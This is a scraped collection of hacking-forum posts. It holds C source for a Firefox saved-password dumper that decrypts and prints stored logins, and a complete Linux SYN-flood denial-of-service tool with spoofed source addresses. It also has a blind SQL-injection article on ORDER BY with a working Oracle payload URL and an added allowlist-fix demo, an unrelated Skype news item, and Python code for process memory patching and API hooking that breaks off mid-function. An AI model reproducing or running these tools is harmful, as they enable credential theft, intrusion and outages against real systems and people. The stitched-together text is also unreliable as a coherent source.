        libplc = LOADLIBRARY(PLC_LIBRARY_NAME);
        if (!libnss || !libplc) {
            printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME);
            return 0;
        }
    } else {
        printf("\n Firefox Libraries loaded successfully");
    }

    // Extract the required functions....
    NSSInit = (NSS_Init)GETPROCADDRESS(libnss, "NSS_Init");
    NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown");
    PK11GetInternalKeySlot = (PK11_GetInternalKeySlot)GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot");
    PK11FreeSlot = (PK11_FreeSlot)GETPROCADDRESS(libnss, "PK11_FreeSlot");
    PK11Authenticate = (PK11_Authenticate)GETPROCADDRESS(libnss, "PK11_Authenticate");
    PK11SDRDecrypt = (PK11SDR_Decrypt)GETPROCADDRESS(libnss, "PK11SDR_Decrypt");
    PK11CheckUserPassword = (PK11_CheckUserPassword)GETPROCADDRESS(libnss, "PK11_CheckUserPassword");
    if (!NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate
        || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword) {
        printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME);
        NSSUnload();
        return 0;
    }

    // Get the functions from PLC library
    PLBase64Decode = (PL_Base64Decode)GETPROCADDRESS(libplc, "PL_Base64Decode");
    if (!PLBase64Decode) {
        printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME);
        NSSUnload();
        return 0;
    } else {
        printf("\n Firefox library initialized successfully");
    }
    return 1;
}

//-----------------------------------------------------------------------
int InitializeNSSLibrary(char *profilePath)
{
    IsNSSInitialized = 0;
    // Initialize the NSS library
    if ((*NSSInit)(profilePath) != SECSuccess) {
        printf("\n\n NSSLib Initialization failed");
        NSSUnload();
        return 0;
    } else {
        IsNSSInitialized = 1;
        printf("\n NSS library initialized successfully");
    }
    return 1;
}

//-----------------------------------------------------------------------
void NSSUnload()
{
    if (IsNSSInitialized && (NSSShutdown != NULL))
        (*NSSShutdown)();
    if (libnss != NULL)
        FREELIBRARY(libnss); // Free nss library
    if (libplc != NULL)
        FREELIBRARY(libplc); // Free plc library
}

//-----------------------------------------------------------------------
// Base64-decodes cryptData and, if it is non-empty, runs it through the
// PK11 SDR decryption; the result is returned in a malloc'd buffer
int DecryptStr(char *cryptData, char **clearData)
{
    int decodeLen = 0;
    int finalLen = 0;
    char *decodeData = NULL;
    char *finalData = NULL;

    if (cryptData[0] != 0) {
        if ((Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL)) {
            return 0;
        }
        // Do the actual PK11 decryption
        if ((PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL)) {
            return 0;
        }
        *clearData = (char *)malloc(finalLen + 1);
        if (*clearData == NULL) {
            printf("\n Insufficient memory");
            return 0;
        }
        memcpy(*clearData, finalData, finalLen);
        *(*clearData + finalLen) = 0; // Null terminate string
        return 1;
    }
    if (Base64Decode(cryptData, clearData, &decodeLen) == 0) {
        return 0;
    }
    return 1;
}

//-----------------------------------------------------------------------
int Base64Decode(char *cryptData, char **decodeData, int *decodeLen)
{
    int len = strlen(cryptData);
    int adjust = 0;

    // Count the padding characters so the decoded length is exact
    if (len > 0 && cryptData[len - 1] == '=') {
        adjust++;
        if (len > 1 && cryptData[len - 2] == '=')
            adjust++;
    }
    *decodeData = (char *)(*PLBase64Decode)(cryptData, len, NULL);
    if (*decodeData == NULL) {
        return 0;
    }
    *decodeLen = (len * 3) / 4 - adjust;
    return 1;
}

//-----------------------------------------------------------------------
int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen)
{
    PK11SlotInfo *slot = 0;
    SECStatus status;
    SECItem request;
    SECItem reply;

    // Find token with SDR key
    slot = (*PK11GetInternalKeySlot)();
    if (!slot) {
        return 0;
    }
    // Decrypt the string
    request.data = (unsigned char *)decodeData;
    request.len = decodeLen;
    reply.data = 0;
    reply.len = 0;
    status = (*PK11SDRDecrypt)(&request, &reply, NULL);
    if (status != SECSuccess) {
        (*PK11FreeSlot)(slot); // do not leak the slot on failure
        return 0;
    }
    *clearData = (char *)reply.data;
    *finalLen = reply.len;
    // Free the slot
    (*PK11FreeSlot)(slot);
    return 1;
}

//-----------------------------------------------------------------------
// Walks a signons*.txt file: the "never remember" URL list first, then
// one block per site with the encrypted field names and values
int DumpCache(char *profilePath, char *signonName)
{
    char buffer[10240];
    char sbuffer[10240];
    char name[10240];
    char *clearData = NULL;
    int bufferLength = 10240;
    int ret;

    if (profilePath == NULL || signonName == NULL) {
        return 0;
    }
    strcpy(sbuffer, profilePath);
    strcat(sbuffer, "\\");
    strcat(sbuffer, signonName);
    if (OpenFile(sbuffer) == 0) { // Open the signon file
        printf("\n\n Failed to open signon file: [%s], skipped. ", signonName);
        return 0;
    }
    printf("\n\n ============================================================== ");
    printf("\n = %s = ", signonName);
    printf("\n ============================================================== ");

    /* Begin cache dump */
    printf("\n\n ======================= Unmanaged URLS ======================= ");
    // Read out the unmanaged ("Never remember") URL list
    ReadLine(buffer, bufferLength); // Skip first line as its a useless version tag
    while (ReadLine(buffer, bufferLength) != 0) {
        // End of unmanaged list
        if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#')
            break;
        printf("\n %s ", buffer);
    }

    printf("\n ======================== Managed URLS ========================\n");
    // read the URL line
    while (ReadLine(buffer, bufferLength) != 0) {
        printf("\n URL: %s ", buffer);
        // Start looping through final signon*.txt file
        while (ReadLine(buffer, bufferLength) != 0) {
            if (buffer[0] == '.') {
                printf("\n ==============================================================\n");
                break; // end of cache entry
            }
            // Check if its a password
            if (buffer[0] == '*') {
                strcpy(name, &buffer[1]);
                ret = ReadLine(buffer, bufferLength);
            } else {
                printf("\n");
                strcpy(name, buffer);
                ret = ReadLine(buffer, bufferLength);
            }
            if (DecryptStr(buffer, &clearData) == 1) {
                printf("\n %s: %s ", name, clearData);
                clearData = NULL;
            }
        }
    }
    printf("\n\n ============================================================== ");
    printf("\n = END %s = ", signonName);
    printf("\n ============================================================== \n");
    return 1;
    /* End cache dump */
}

// The post ends here: main() and the remaining declared helpers
// (GetFFProfilePath, GetFFLibPath, Explode, Split, ...) are not included.
```
//----------------------------------------------------------------------- // Find firefox path / libraries char *GetFFLibPath() { char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command"; char path[_MAX_PATH] =""; char *FFDir = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox path value from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || path[0] == 0) { printf("\n Unable to locate firefox installation path"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); // Remove extra quotes if( path[0] == '\"' ) { for(int i=0; i < strlen(path)-1 ; i++) path[i] = path[i+1]; } printf("\n Firefox main exe: %s", path); // Terminate the string at last "\\" for(int j=strlen(path)-1; j>0; j--) { if( path[j] == '\\' ) { path[j]=0; break; } } FFDir = (char*) malloc( strlen(path) + 1); if(FFDir) strcpy(FFDir, path); printf("\n Firefox path: %s", FFDir); return FFDir; } //----------------------------------------------------------------------- char *GetFFProfilePath() { char profilePath[_MAX_PATH] = ""; char partialPath[] = "Application Data\\Mozilla\\Firefox"; char profileFile[_MAX_PATH]; char line[1024]; DWORD pathSize = _MAX_PATH; char *finalProfilePath = NULL; int isDefaultFound = 0; HANDLE token; // Get current user's profile directory if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE ) { printf("\n Failed to get current process token "); return NULL; } if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE ) { printf("\n Failed to get user profile directory"); return NULL; } printf("\n User Profile 
directory: %s\n", profilePath); // Get firefox profile directory strcpy(profileFile, profilePath); strcat(profileFile,"\\"); strcat(profileFile,partialPath); strcat(profileFile,"\\profiles.ini"); // Open the firefox profile setting file FILE *profile = fopen(profileFile, "r"); if( profile == NULL ) { printf("\n Unable to find firefox profile file: %s ", profileFile); return NULL; } // This indicates that we are looking under default profile while(fgets(line, 1024, profile)) { StrLwr(line); if( !isDefaultFound && ( strstr(line, "name=default") != NULL) ) { isDefaultFound = 1; continue; } // Found default profile / check for path if( isDefaultFound ) { if( strstr(line,"path=") != NULL) { char *slash = strstr(line,"/"); if( slash != NULL ) *slash = '\\'; // remove \n from the end of line line[strlen(line)-1] = 0; char *start = strstr(line,"="); int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ; finalProfilePath = (char *) malloc(totalLen); if( finalProfilePath ) { strcpy(finalProfilePath,profilePath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,partialPath); strcat(finalProfilePath,"\\"); strcat(finalProfilePath,start+1); printf("\n Final profile path: %s \n", finalProfilePath); } break; } } } fclose(profile); return finalProfilePath; } //----------------------------------------------------------------------- char *GetFFVersion() { char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox"; char *FFVers = NULL; DWORD pathSize = _MAX_PATH; DWORD valueType; HKEY rkey; // Open firefox registry key if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS ) { printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey ); return NULL; } // Read the firefox path value if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS ) { printf("\n Failed to read the firefox version from registry "); RegCloseKey(rkey); return NULL; } if( pathSize <= 0 || 
Vers[0] == 0) { printf("\n Path value read from the registry is empty"); RegCloseKey(rkey); return NULL; } RegCloseKey(rkey); FFVers = (char*) malloc( strlen(Vers) + 1); if( FFVers ) strcpy(Vers,FFVers); if (FFVers[1] == '1') { version = 1; }else{ if (FFVers[1] == '2') { version = 2; }else{ if (FFVers[1] == '3') { version = 3; } } } printf("\n Firefox version: %d", version); return (FFVers); } //----------------------------------------------------------------------- int main(int argc, char* argv[]) { char *ProfilePath = NULL; //Profile path char *FFDir = NULL; //Firefox main installation path char buff[1024]; ProfilePath = GetFFProfilePath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox profile directory does not exist or no profiles found. \n"); return 0; } FFDir = GetFFLibPath(); if( !DirectoryExists(ProfilePath)) { printf("\n\n Firefox installation path does not exist or is not installed. \n"); return 0; } if( InitFFLibs(FFDir) ) { if( InitializeNSSLibrary(ProfilePath) ) { //Take 3 Mozilla dumps DumpCache(ProfilePath,"signons.txt"); DumpCache(ProfilePath,"signons2.txt"); DumpCache(ProfilePath,"signons3.txt"); //DumpCache(ProfilePath,"signons.sqlite"); //Dont forget to flush :/ NSSUnload(); } } printf("\n ======================= End Cache Dump =======================\n"); while(1){ Sleep(10000); //Just loop until user exits } } //----------------------------------------------------------------------- Sursa: LeetCoders
-
[GNU Linux C] SYN Flooder source
Author: jakash3 (cred)

C source code for Linux for sending multiple SYN flagged tcp/ip packets with spoofed source addresses to spawn half-open fake connections with tcp hosts. A form of DoS attack using ipv4 addressing that may still work against hosts without syn cookies enabled. Using raw tcp ipv4 sockets, it sends packets in the form of an IP header and an appended TCP header with no initial data. Checksum for IP header is calculated for the IP header only, while checksum for TCP header is calculated for the TCP pseudo-header concatenated with the actual TCP header and data.

synflood.c

```c
#include "tcpip.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <signal.h>
#include <errno.h>

ushort csum(short* data, int len);
char* randip(char* dst);
ushort rand16();
uint rand32();

int sd;

void help() {
    printf("SYN flooder - by Jakash3\nArguments: IPV4_ADDR PORT\n");
    exit(1);
}

void quit(int sig) {
    close(sd);
    exit(0);
}

int main(int argc, char** argv) {
    if (argc!=3) help();
    /* Map CTRL-C to quit() */
    struct sigaction sa;
    sa.sa_handler = &quit;
    sa.sa_flags = 0;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGINT, &sa, 0);
    char rip[16];
    char packet[4096];
    struct iphdr ip;
    struct tcpph tph;
    struct tcphdr tcp;
    struct sockaddr_in sin;
    const int on = 1;
    memset(&packet, 0, 40);
    ip.ihl = 5;
    ip.ipv = 4;
    ip.tos = 0;
    ip.len = IPHDR_LEN + TCPHDR_LEN;
    ip.id = htons(rand16());
    ip.ttl = 64;
    ip.proto = IPPROTO_TCP;
    ip.src = (uint)inet_addr(randip(rip));
    ip.dst = (uint)inet_addr(argv[1]);
    ip.chksum = 0;
    ip.chksum = csum((short*)&ip, IPHDR_LEN);
    tcp.sport = htons((short)atoi(argv[2]));
    tcp.dport = htons((short)atoi(argv[2]));
    tcp.seq = htonl(rand32());
    tcp.offset = sizeof(struct tcphdr) / 4;
    tcp.flgs = TCP_SYN;
    tcp.chksum = 0;
    tph.src = ip.src;
    tph.dst = ip.dst;
    tph.zero = 0;
    tph.proto = IPPROTO_TCP;
    tph.tcp_len = sizeof(struct tcphdr);
    memmove(packet, &tph, TCPPH_LEN);
    memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN);
    tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN);
    memmove(packet, &ip, IPHDR_LEN);
    memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN);
    sd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (sd == -1) {
        printf("Failed to create socket. Error code: %d\n", errno);
        exit(1);
    }
    if (setsockopt(sd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) == -1) {
        printf("Failed to set socket options. Error code: %d\n", errno);
        exit(1);
    }
    sin.sin_family = AF_INET;
    sin.sin_port = htons(tcp.dport);
    memmove(&(sin.sin_addr), &(ip.dst), sizeof(struct in_addr));
    while (1) {
        if (sendto(sd, packet, ip.len, 0, (struct sockaddr*)&sin, sizeof(struct sockaddr)) == -1) {
            printf("Failed to send SYN packet(s). Error code: %d\n", errno);
            exit(1);
        } else {
            printf("Sent SYN packet with spoofed ip: %s\n", rip);
        }
        ip.id = htons(rand16());
        ip.src = (uint)inet_addr(randip(rip));
        ip.chksum = 0;
        ip.chksum = csum((short*)&ip, IPHDR_LEN);
        tph.src = ip.src;
        tcp.seq = htonl(rand32());
        tcp.chksum = 0;
        memmove(packet, &tph, TCPPH_LEN);
        memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN);
        tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN);
        memmove(packet, &ip, IPHDR_LEN);
        memmove(packet + IPHDR_LEN, &tcp, TCPHDR_LEN);
    }
}

ushort csum(short* data, int len) {
    int sum = 0;
    for (; len > 1; len -= 2) sum += *data++;
    if (len == 1) sum += *(uchar*)data;
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return ~sum;
}

/* The best I can do for generating a random ipv4 address */
char* randip(char* dst) {
    dst[0] = 0;
    int i, j, k;
    srandom(time(0));
    srand(random());
    srandom(rand());
    j = rand() + random();
    for (i = 0, k = 0; k < 4; i += strlen(dst + i), k++, j += ((rand() + (int)dst) % i) ^ time(0)) {
        srand((int)dst + i + k);
        srand(j + dst[i+k] + (int)&i + rand());
        j = rand() % 255;
        sprintf(dst + i, "%d.", j);
    }
    dst[i-1] = 0;
    return dst;
}

ushort rand16() {
    srandom(time(0));
    srand(random());
    srandom(rand());
    return (random() + rand() + time(0)) % 65535;
}

uint rand32() {
    srandom(time(0));
    srand(random());
    srandom(rand());
    return (random() + rand() & time(0));
}
```

tcpip.h

```c
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>

typedef unsigned char uchar;
typedef unsigned short ushort;
typedef unsigned int uint;

/* Internet Datagram Header */
#define IPHDR_LEN 20
struct iphdr {
    uchar ipv:4;    /* Internet Protocol Version */
    uchar ihl:4;    /* Total length (in DWORDs) */
    uchar tos;      /* Type of Service */
    ushort len;     /* Total length */
    ushort id;      /* Identification number */
    ushort frag;    /* Fragment offset and flags */
    uchar ttl;      /* Time to live */
    uchar proto;    /* Protocol type */
    ushort chksum;  /* Checksum */
    uint src;       /* Source IP Address */
    uint dst;       /* Destination IP Address */
};

/* TCP Header */
#define TCPHDR_LEN 20
struct tcphdr {
    ushort sport;      /* Source Port */
    ushort dport;      /* Destination Port */
    uint seq;          /* Sequence number */
    uint ack;          /* Acknowledgement number */
    uchar reserved:4;
    uchar offset:4;    /* Size of TCP Header in DWORDs */
    uchar flgs;        /* TCP Flags */
#define TCP_FIN 0x01
#define TCP_SYN 0x02
#define TCP_RST 0x04
#define TCP_PSH 0x08
#define TCP_ACK 0x10
#define TCP_URG 0x20
    ushort win;        /* Window. Size of data to accept */
    ushort chksum;     /* Checksum */
    ushort urgp;       /* idk */
};

/* TCP Psuedo-header */
#define TCPPH_LEN 12
struct tcpph {
    uint src;
    uint dst;
    uchar zero;
    uchar proto;
    ushort tcp_len;
};
```

Source: LeetCoders
-
Exploiting SQL Injection in ORDER BY on Oracle/MySQL
submitted by alla on 10 May, 2011 - 15:10

Consider the following piece of code:

$sql = "SELECT something FROM some_table WHERE id=? ORDER BY $column_name";

The WHERE clause is parametrized, but the ORDER BY isn't. This happens often enough. Assuming that $column_name comes from user input, this code is vulnerable to SQL injection.

The way to exploit such SQL injection on a MySQL backend is described by Sumit Siddharth here and by Jacco van Tuijl here. I couldn't find any clues for Oracle though, so now that I have figured it out, here is how.

This is a blind SQL injection technique: we'll have to extract one bit of info per query, using the order in which the data is returned by the application.

Let's assume that the vulnerable script is called as vulnerable.php?sortcolumn=id. In this case it returns the following data:

foo
bar
baz

We can try sorting by other columns and see if the data gets returned in a different order. Say, if we try vulnerable.php?sortcolumn=something, we get back:

bar
baz
foo

Now all we need to do is to get the query to sort the data by a different column depending on the value of a given expression. In Oracle the following syntax works:

ORDER BY (case when ((boolean_expression)) then id else something end)

If boolean_expression is true the result will be sorted by id, otherwise by something. So, the vulnerable script may be called like this:

vulnerable.php?sortcolumn=(case+when+((ASCII(SUBSTR((select+table_name+from+all_tables+where+rownum%3d1),1))>%3D128))+then+id+else+something+end)

This will extract the most significant bit of the first character of the first row returned by the "select table_name from all_tables" query. Actually fetching significant amounts of data obviously requires automation.

MySQL:
http://www.notsosecure.com/folder2/2008/08/01/injection-in-order-by-clause/
http://2600nl.net/2010/05/29/exploiting-sql-injection-in-order-by-clause-mysql-5/

Source: http://www.gremwell.com/exploiting_sql_injection_in_order_by_on_oracle
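Added example, not part of the original article: the concatenated ORDER BY from the post next to its fix. A column name cannot be bound as a query parameter, so the fix is an allowlist lookup before the SQL string is built. SQLite stands in for the Oracle backend, and the table, rows and SORT_COLUMNS map are constructed for the demo.

```python
import sqlite3

# Constructed sample data mirroring the article: sorted by id the names come
# back foo, bar, baz; sorted by "something" they come back bar, baz, foo.
ROWS = [(1, "foo", "c"), (2, "bar", "a"), (3, "baz", "b")]

# Allowlist: the sort keys the HTTP layer may send, mapped to real column
# names. Nothing outside this map is ever concatenated into SQL.
SORT_COLUMNS = {"id": "id", "something": "something"}


def connect():
    """In-memory SQLite database standing in for the Oracle backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE some_table (id INTEGER, name TEXT, something TEXT)")
    conn.executemany("INSERT INTO some_table VALUES (?, ?, ?)", ROWS)
    return conn


def fetch_vulnerable(conn, sort_column):
    """The article's pattern: WHERE is bound, ORDER BY is concatenated.
    Any expression, including the CASE trick, is accepted as the sort key."""
    sql = "SELECT name FROM some_table WHERE id >= ? ORDER BY " + sort_column
    return [row[0] for row in conn.execute(sql, (1,))]


def sort_key_allowed(sort_key):
    """True only for keys present in the allowlist."""
    return sort_key in SORT_COLUMNS


def fetch_hardened(conn, sort_key):
    """Allowlist lookup before the SQL string is built: an unknown key is
    rejected, so no expression can ride in on the sort parameter."""
    if not sort_key_allowed(sort_key):
        raise ValueError("unsupported sort column: %r" % sort_key)
    sql = "SELECT name FROM some_table WHERE id >= ? ORDER BY " + SORT_COLUMNS[sort_key]
    return [row[0] for row in conn.execute(sql, (1,))]


if __name__ == "__main__":
    db = connect()
    # A CASE expression with a constant condition shows the sort-order oracle.
    probe = "(case when 1=0 then id else something end)"
    print("vulnerable, probe accepted:", fetch_vulnerable(db, probe))
    try:
        fetch_hardened(db, probe)
    except ValueError as exc:
        print("hardened, probe rejected:", exc)
```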
-
Microsoft confirms purchase of Skype for $8.5 billion Tom Warren 2 hours ago Microsoft announced on Tuesday the acquisition of Skype. The software giant announced the deal on Tuesday, valued at $8.5 billion cash. Both Skype and Microsoft’s board of directors have approved the deal and Microsoft will create a new business division especially for Skype. Skype CEO Tony Bates will assume the title of president of the Microsoft Skype Division, reporting directly to Ballmer. “Skype is a phenomenal service that is loved by millions of people around the world,” said Microsoft CEO Steve Ballmer. “Together we will create the future of real-time communications so people can easily stay connected to family, friends, clients and colleagues anywhere in the world.” Microsoft says Skype will support Microsoft devices like Xbox and Kinect, Windows Phone and a wide array of Windows devices, and Microsoft will connect Skype users with Lync, Outlook, Xbox Live and other communities. Microsoft will continue to invest in and support Skype clients on non-Microsoft platforms. “Tony Bates has a great track record as a leader and will strengthen the Microsoft management team. I’m looking forward to Skype’s talented global workforce bringing its insights, ideas and experience to Microsoft,” Ballmer said. Skype currently has 170 million connected users and saw over 207 billion minutes of voice and video conversations in 2010 alone. Microsoft’s promise for Windows Phone, Xbox and Kinect Skype integration confirms that the company will look to use Skype broadly across its products. Skype was originally founded in 2003 and acquired by eBay in September 2005. An investment group led by Silver Lake acquired Skype in 2009. 
Speaking on behalf of the investor group that sold Skype to Microsoft, Egon Durban, managing director of Silver Lake, said: “We are thrilled with Skype’s transformation during the period of our ownership and grateful for the extraordinary commitment of its management team and employees. We are excited about Skype’s long-term future with Microsoft, as it is poised to become one of the world’s most dynamic and comprehensive communications platforms.” Source: Microsoft confirms purchase of Skype for $8.5 billion | WinRumors
-
API Hooking in Python
Author: cadaver (cred)

```python
# patcher.py
# handles patching and unpatching of process memory.
# public domain code.

from ctypes import *
from win32api import *
from pytcc import pytcc
from struct import pack, unpack, calcsize
from win32gui import PyGetString, PySetMemory, PySetString
from win32con import MEM_COMMIT, MEM_RESERVE, MEM_RELEASE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS
from distorm import Decode

DEBUG = True

def DB (msg):
    global DEBUG
    if DEBUG:
        print (msg)

def OpenProcess (pid=GetCurrentProcessId()):
    """Opens a process by pid."""
    DB ("[openProcess] pid:%s."%pid)
    phandle = windll.kernel32.OpenProcess (\
        PROCESS_ALL_ACCESS,
        False,
        pid )
    assert phandle, "Failed to open process!\n%s" % WinError (GetLastError ()) [1]
    return phandle

def readMemory (phandle, address, size):
    """readMemory (address, size, phandle):"""
    cbuffer = c_buffer (size)
    success = windll.kernel32.ReadProcessMemory (\
        phandle,
        address,
        cbuffer,
        size,
        0 )
    assert success, "Failed to read memory!\n%s" % WinError (GetLastError()) [1]
    return cbuffer.raw

def writeMemory (phandle, address=None, data=None):
    """Writes data to memory and returns the address."""
    assert data
    size = len (data) if isinstance (data, str) else sizeof (data)
    cdata = c_buffer (data) if isinstance (data, str) else byref (data)
    if not address:
        address = allocate (size, phandle)
    success = windll.kernel32.WriteProcessMemory (\
        phandle,
        address,
        cdata,
        size,
        0 )
    assert success, "Failed to write process memory!\n%s" % WinError (GetLastError()) [1]
    DB ("[write memory] :%s OK." % address)
    return address

def allocate (size, phandle):
    """Allocates memory of size in phandle."""
    address = windll.kernel32.VirtualAllocEx (\
        phandle,
        0,
        size,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE )
    assert address, "Failed to allocate memory!\n%s" % WinError(GetLastError()) [1]
    DB ("[memory allocation] :%s" % address)
    return address

def releaseMemory (address, size, phandle):
    """Releases memory by address."""
    return windll.kernel32.VirtualFreeEx (\
        phandle,
        address,
        size,
        MEM_RELEASE )

def transport (data, phandle):
    size = len (data)
    memory = allocate (size, phandle)
    writeMemory (phandle, memory, data)
    return memory

def get_patch (destination, params_size=0):
    """mov eax, destination
    call eax
    retn params_size
    """
    if isinstance (destination, (int,long)):
        destination = pack ("i", destination)
    if isinstance (params_size, (int,long)):
        params_size = pack ("h", params_size)
    return '\xb8%s\xff\xd0\xc2%s' % (destination, params_size)

def get_cparams_size (cparams):
    if not cparams:
        return 0
    s = ''
    for param in cparams:
        s += "size += sizeof (%s);\n" % param
    c_code = """
int getsize () {
    int size = 0;
    %s
    return size;
}""" % s
    #DB (c_code)
    ccompiler = pytcc ()
    ccompiler.compile (c_code)
    ccompiler.relocate ()
    getsize = ccompiler.get_function ("getsize")
    size = getsize ()
    # ccompiler.delete ()
    return size

def get_cparams_size_b (cparams):
    return sum (map (calcsize, [param._type_ for param in cparams]))

def find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000):
    """find_good_spot_to_patch (apiaddress, needed_size, maxscan=4000):
    Searches the instructions inside an API for a good place to patch."""
    # DEBUG
    if DEBUG == 2:
        bytes = PyGetString (apiaddress, needed_size * 2)
        dprint (apiaddress, bytes)
    # # # #
    aoffset = 0
    found_space = 0
    position = apiaddress
    while found_space < needed_size:
        bytes = PyGetString (position, 24)
        # DB ("found_space: %s. aoffset: %s. apiaddress: %s." % (found_space, aoffset, hex(position)))
        # if does_code_end_function (bytes): raise "Function end found before enough space was found!"
        offset, size, instruction, hexstr = Decode (position, bytes) [0]
        if "ret" in instruction.lower ():
            raise RuntimeError ("Function end found before enough space was found!")
        if not filter (lambda x:x.lower() in instruction.lower(), ["call", "jmp"]):
            found_space += size
        else:
            found_space = 0
        aoffset += size
        if aoffset >= maxscan:
            raise RuntimeError ("Maxscan exceeded while searching for a good spot to patch!")
        position += size
    return apiaddress + (aoffset - found_space)

class patcher:
    source = None
    destination = None
    jmp_asm = None
    original_bytes = None
    params_size = 0
    pid = None
    phandle = None
    duplicate_api = None
    original_api = None

    def __init__ (self, source=None, destination=None, params_size=0, pid=GetCurrentProcessId () ):
        self.set_pid (pid)
        self.set_source (source)
        self.set_destination (destination)
        self.set_params_size (params_size)

    def set_pid (self, pid):
        self.close ()
        self.phandle = OpenProcess (pid)
        self.pid = pid

    def set_source (self, source):
        self.source = source

    def set_destination (self, destination):
        self.destination = destination

    def set_params_size (self, size):
        self.params_size = size

    def set_source_as_api (self, apiname, dllname="kernel32.dll", free=True):
        module = LoadLibrary (dllname)
        procedure = GetProcAddress (module, apiname)
        if free:
            FreeLibrary (module)
        assert procedure
        # ctypes handle for the real API, looked up by name (no eval needed)
        self.original_api = getattr (getattr (windll, dllname.strip (".dll")), apiname)
        self.source = find_good_spot_to_patch (procedure, len (get_patch (0, self.params_size)))
        if DEBUG:
            DB ("found good spot to patch: %s %s. Offset from original api address: %s." \
                %(self.source, hex (self.source), self.source - procedure))

    def patch (self):
        assert all ((self.phandle, self.source, self.destination)), "Patch source or destination not set!"
        assert not self.original_bytes, "Already patched!"
        self.jmp_asm = get_patch (self.destination, self.params_size)
        jmp_asm_size = len (self.jmp_asm)
        self.original_bytes = PyGetString (self.source, jmp_asm_size)
        assert self.original_bytes, "Failed to capture original_bytes."
        writeMemory (\
            phandle=self.phandle,
            address=self.source,
            data=self.jmp_asm)
        msg = "[jmp_asm]:%s\n[jmp_asm_size]:%s\n[original_bytes]:%s\n" \
            % (repr (self.jmp_asm), jmp_asm_size, repr (self.original_bytes))
        DB (msg)

    def unpatch (self):
        if not self.original_bytes:
            raise RuntimeError ("Not patched!")
        assert all ((self.phandle, self.source, self.destination)), "Not initialized!"
        writeMemory (\
            phandle=self.phandle,
            address=self.source,
            data=self.original_bytes )
        self.original_bytes = None

    def close (self):
        if self.phandle:
            windll.kernel32.CloseHandle (self.phandle)
            self.phandle = None

    def release (self):
        if self.phandle and self.duplicate_api:
            releaseMemory (self.duplicate_api, 0, self.phandle)

    def call_original_api (self, *args, **kwargs):
        return self.original_api (*args, **kwargs)

    def call_duplicate_api (self, types, *args, **kwargs):
        return WINFUNCTYPE (c_void_p, types) (self.duplicate_api) (*args, **kwargs)

    def __del__ (self):
        try:self.unpatch ()
        except:pass
        try:self.release ()
        except:pass
        try:self.close ()
        except:pass

def dprint (a, c):
    """Pretty prints disassembled bytes. dprint (offset, bytes)."""
    x = Decode (a, c)
    print "[deci addr : hexi addr] [size] instruction\n"
    for offset, size, instruction, hexstr in x:
        print "[%s : %s] [%s] %s" % (a,hex (a), size, instruction)
        a += size
    print
#cad
```

```python
# tramper.py
# Relocates bytes of an API and creates a jump from those bytes to the original API effectively negating a hook.
# TODO !Recalculate Relocated Relative jmp and call addresses.
# public domain code.

from ctypes import *
from win32api import *
from pytcc import pytcc
from struct import pack, unpack
from win32gui import PyGetString, PySetMemory, PySetString
from win32con import MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, PROCESS_ALL_ACCESS
from distorm import Decode
from patcher import OpenProcess, readMemory, writeMemory, allocate, transport

DEBUG = True

def DB (msg):
    global DEBUG
    if DEBUG:
        print (msg)

def tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"):
    """tramper (apiaddress, hook_size, apiname=None, dllname="kernel32"):
    Creates a duplicate API using the trampoline method and returns its address.
    """
    if DEBUG:
        global hprocess, landing_offset, instructions, landing_address, tramp_memory, tramp_code, original_bytes
    if not apiaddress:
        dll = LoadLibrary (dllname)
        apiaddress = GetProcAddress (dll, apiname)
    landing_offset = 0
